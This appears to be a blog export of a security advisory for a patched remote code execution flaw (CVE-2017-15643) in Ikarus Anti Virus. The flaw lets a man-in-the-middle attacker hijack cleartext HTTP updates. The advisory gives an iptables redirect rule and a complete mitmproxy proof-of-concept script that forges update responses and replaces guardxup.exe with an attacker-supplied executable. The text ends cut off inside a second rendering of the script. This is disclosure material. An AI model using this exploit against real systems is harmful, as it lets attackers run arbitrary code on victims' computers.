{"id":10623,"date":"2017-11-27T14:19:10","date_gmt":"2017-11-27T22:19:10","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/11\/27\/news-4395\/"},"modified":"2017-11-27T14:19:10","modified_gmt":"2017-11-27T22:19:10","slug":"news-4395","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/11\/27\/news-4395\/","title":{"rendered":"SSD Advisory \u2013 Ikarus Anti Virus Remote Code Execution Vulnerability"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 27 Nov 2017 07:50:39 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3542\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3542');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>The following advisory describes a remote code execution vulnerability found in Ikarus Anti Virus 2.16.7.<\/p>\n<p>IKARUS anti.virus \u201csecures your personal data and PC from all kinds of malware. Additionally, the anti-spam module protects users from spam and from malware in e-mails. 
Choose the award-winning IKARUS scan engine to protect yourself effectively against cyber criminals. IKARUS is the best scan engine in the world, detecting unknown and known threats every day.\u201d<\/p>\n<p><strong>Credit<\/strong><\/p>\n<p>An independent security researcher reported this vulnerability to Beyond Security's SSD.<\/p>\n<p><strong>Vendor Response<\/strong><\/p>\n<p>Update 1<\/p>\n<p>CVE: CVE-2017-15643<\/p>\n<p>The vendor has released patches for these vulnerabilities. For more information:<br \/> https:\/\/www.ikarussecurity.com\/about-ikarus\/security-blog\/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001\/<\/p>\n<p><span id=\"more-3542\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><\/p>\n<p>A network attacker (man-in-the-middle) can achieve remote code execution on a computer running Ikarus anti-virus.<\/p>\n<p>Ikarus AV for Windows updates over cleartext HTTP and validates the downloaded file with a CRC32 checksum and an update value.<\/p>\n<p>In addition, Ikarus checks the update version number; raising the update version number pushes the update process to perform an update.<\/p>\n<p>The executable that performs updates in Ikarus is guardxup.exe.<\/p>\n<p>guardxup.exe sends the following update request over port 80:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter 
v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f5d6051f968814206\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">GET \/cgi-bin\/virusutilities.pl?A=7534ED66&amp;B=6.1.1.0.11.1.256.7601&amp;C=1005047.2013019.2001016.98727&amp;F=4.5.2%3bO=0%3bSP=0&amp;E=WD-194390-VU HTTP\/1.1\nAccept: *\/*\nUser-Agent: virusutilities(6.1,0,1005047)\nHost: updates.ikarus.at\nConnection: close<\/textarea><\/div>\n<\/p><\/div>\n<p>The server responds as follows:<\/p>\n<\/p>\n<div id=\"crayon-5a1c8f5d60526863157776\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" 
class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">HTTP\/1.1 200 OK\nDate: Sun, 23 Oct 2016 04:51:05 GMT\nServer: Apache\/2.4.10 (Debian) mod_perl\/2.0.9dev Perl\/v5.20.2\nContent-Disposition: inline; filename=virusutilities\nContent-Length: 306\nConnection: close\nContent-Type: text\/plain; charset=ISO-8859-1\n\n&lt;url&gt;\n\tfull\thttp:\/\/mirror04.ikarus.at\/updates\/\n\tdiff\thttp:\/\/mirror06.ikarus.at\/updates\/\n&lt;\/url&gt;\n&lt;up&gt;\n\tantispam_w64\t001000076\n\tantispam\t001000076\n\tupdate\t001005047\n\tvirusutilities\t002013019\n\tt3modul_w64\t002001016\n\tt3modul\t002001016\n\tsdb\t000007074\n\tt3sigs\t000098727\n&lt;\/up&gt;\n&lt;dependence&gt;\n\tt3modul\n&lt;\/dependence&gt;<\/textarea><\/div>\n<\/p><\/div>\n<p>Through a proxy, we can modify the response, adding 1 to the \u201cupdate\u201d value, and forward the response to the client.<\/p>\n<p>The client will then request the update from this URL: http:\/\/mirror04.ikarus.at\/updates\/guardxup001005048.full<\/p>\n<p>The Ikarus server will return a 404:<\/p>\n<\/p>\n<div id=\"crayon-5a1c8f5d60529924886288\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">HTTP\/1.1 404 Not Found\nServer: nginx\/1.6.2\nDate: Sun, 23 Oct 2016 04:53:05 GMT\nContent-Type: text\/html\nContent-Length: 168\nConnection: close\n\n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;404 Not Found&lt;\/title&gt;&lt;\/head&gt;\n&lt;body bgcolor=&quot;white&quot;&gt;\n&lt;center&gt;&lt;h1&gt;404 Not Found&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.6.2&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/textarea><\/div>\n<\/p><\/div>\n<p>But we can modify the above response using the IKUP format:<\/p>\n<\/p>\n<div id=\"crayon-5a1c8f5d6052c215795329\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line 
Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">Bytes: 0x0 - 0x3 == IKUP # header\nBytes: 0x4 - 0x7 == 0x0s\nBytes: 0x8 == 0x3C # pointer to start of PE EXE MZ header\nBytes: 0x20 - 0x23 == update value in little endian (script fixes it up)\nBytes: 0x24 - 0x27 == crc32 checksum (script populates from provided binary)\nBytes: 0x28 -&gt; pointer to MZ header == 0x0s\nBytes: 'pointer to MZ header' -&gt; ? 
== appended exe<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d6052c215795329-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d6052c215795329-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d6052c215795329-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d6052c215795329-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d6052c215795329-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d6052c215795329-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d6052c215795329-7\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d6052c215795329-1\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IKUP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># header<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d6052c215795329-2\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d6052c215795329-3\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x3C<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># pointer to start of PE EXE MZ header<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d6052c215795329-4\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x23<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">update <\/span><span class=\"crayon-e\">value <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">little <\/span><span class=\"crayon-e\">endian<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">script <\/span><span class=\"crayon-e\">fixes <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-v\">up<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d6052c215795329-5\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x24<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-cn\">0x27<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">crc32 <\/span><span class=\"crayon-e\">checksum<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">script <\/span><span class=\"crayon-e\">populates <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">provided <\/span><span class=\"crayon-v\">binary<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d6052c215795329-6\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x28<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pointer <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">MZ <\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d6052c215795329-7\"><span class=\"crayon-v\">Bytes<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;pointer to MZ header&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">appended <\/span><span class=\"crayon-v\">exe<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  
<\/p>\n<p>We then forward the modified response to the client, where our executable replaces guardxup.exe.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Install mitmproxy 0.17: pip install mitmproxy==0.17<\/p>\n<p>To use this script, forward the client's port 80 traffic through the man-in-the-middle host, which runs in transparent proxy mode.<\/p>\n<p>Set up your firewall rules so that the traffic is intercepted on port 8080:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f5d6052e021217181\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 
crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d6052e021217181-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d6052e021217181-1\"><span class=\"crayon-e\">sudo <\/span><span class=\"crayon-v\">iptables<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nat<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-i\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PREROUTING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tcp<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-v\">destination<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-i\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">REDIRECT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8080<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0006 seconds] -->  <\/p>\n<p>Then run the script as follows:<\/p>\n<p>.\/poc.py file_to_deploy.exe<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f5d60531148303101\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea 
wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">#!\/usr\/bin\/env python2\nimport os\ntry:\n    from mitmproxy import controller, proxy, platform\n    from mitmproxy.proxy.server import ProxyServer\nexcept:\n    from libmproxy import controller, proxy, platform\n    from libmproxy.proxy.server import ProxyServer\n\nimport re\nimport struct\nimport sys\nimport zlib\nimport bz2\n\nclass IkarusPOC(controller.Master):\n    def __init__(self, server, backdoored_file):\n        controller.Master.__init__(self, server)\n        self.ikarus= {}\n        self.crc_file = 0\n        self.backdoored_file = backdoored_file\n        self.to_replace = 0\n        self.already_patched = 0\n        self.update_number = 0\n\n    def win_header(self):\n        self.update_header = &quot;\\x49\\x4B\\x55\\x50\\x00\\x00\\x00\\x00\\x3C\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;\n        self.update_header += &quot;\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;\n\n        self.update_header += struct.pack(&quot;&lt;I&quot;, self.to_replace)        # update number\n        self.update_header += struct.pack(&quot;&lt;I&quot;, self.crc_file)          # checksum\n        self.update_header += &quot;\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;\n        self.update_header += &quot;\\x00\\x00\\x00\\x00&quot;\n\n    def run(self):\n        try:\n            return controller.Master.run(self)\n        except KeyboardInterrupt:\n            self.shutdown()\n\n    def crc_stream(self, a_string):\n        prev = 0\n        return zlib.crc32(a_string, prev) &amp; 0xFFFFFFFF\n\n    def crc(self, some_file):\n        prev = 0\n        for eachLine in open(some_file,&quot;rb&quot;):\n            prev = zlib.crc32(eachLine, prev)\n        self.crc_file = prev &amp; 0xFFFFFFFF\n        print &quot;[*] crc_file&quot;, self.crc_file\n\n    def handle_request(self, flow):\n        hid = (flow.request.host, flow.request.port)\n        flow.reply()\n\n    def handle_response(self, flow):\n        print &quot;[*] flow.request.host:&quot;, flow.request.host\n        if &quot;cgi-bin\/imsa-lite.pl&quot; in flow.request.path and &quot;Dalvik&quot; in flow.request.headers['User-Agent'] and self.already_patched &lt;=2:\n            content = flow.reply.obj.response.content\n            p = re.compile(&quot;antispam[\\s|\\t].*\\n&quot;)\n            result = p.search(content)\n            the_result = result.group(0)\n\n            original_update_number= [int(s) for s in the_result.split() if s.isdigit()][0]\n            if self.update_number == 0:\n                self.update_number = original_update_number\n            self.to_replace = self.update_number + 1\n            content = content.replace(str(original_update_number), str(self.to_replace))\n            flow.reply.obj.response.content = content\n\n        if &quot;cgi-bin\/virusutilities.pl&quot; in flow.request.path and 'virusutilities' in flow.request.headers['User-Agent'] and self.already_patched &lt;= 2:\n            print &quot;[*] Found update response, modifying...&quot;\n            content = flow.reply.obj.response.content\n            p = re.compile(&quot;update[\\s|\\t].*\\n&quot;)\n            result = p.search(content)\n            the_result = result.group(0)\n            original_update_number = [int(s) for s in the_result.split() if s.isdigit()][0]\n            if self.update_number == 0:\n                self.update_number = original_update_number\n            self.to_replace = self.update_number + 1\n            print '[*] Update_number', self.update_number\n            print '[*] Replace number', self.to_replace\n            content = content.replace(str(original_update_number), str(self.to_replace))\n            print &quot;[*] Updated content&quot;, content\n            flow.reply.obj.response.content = content\n\n        if 'guard' in flow.request.path and 'full' in flow.request.path and self.already_patched &lt;= 2:\n            print '[*] Found guardxup.exe request! Modifying request and pushing provided file!'\n\n            self.crc(self.backdoored_file)\n            self.win_header()\n            with open(self.backdoored_file, 'rb') as f:\n                file_out  = f.read()\n            content = self.update_header + file_out\n\n            with open('\/tmp\/update_test.full', 'wb') as f:\n                f.write(content)\n            flow.reply.obj.response.content = content\n            flow.reply.obj.response.status_code = 200\n            self.already_patched += 1\n\n        flow.reply()\n\n\nconfig = proxy.ProxyConfig(port=8080, mode='transparent')\nserver = ProxyServer(config)\nm = IkarusPOC(server, sys.argv[1])\nm.run()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5a1c8f5d60531148303101-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-104\">104<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" 
id=\"crayon-5a1c8f5d60531148303101-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-3\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">mitmproxy <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">controller<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proxy<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">platform<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-5\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">mitmproxy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">proxy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">server <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">ProxyServer<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-6\"><span class=\"crayon-v\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">libmproxy <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">controller<\/span><span class=\"crayon-sy\">,<\/span><span 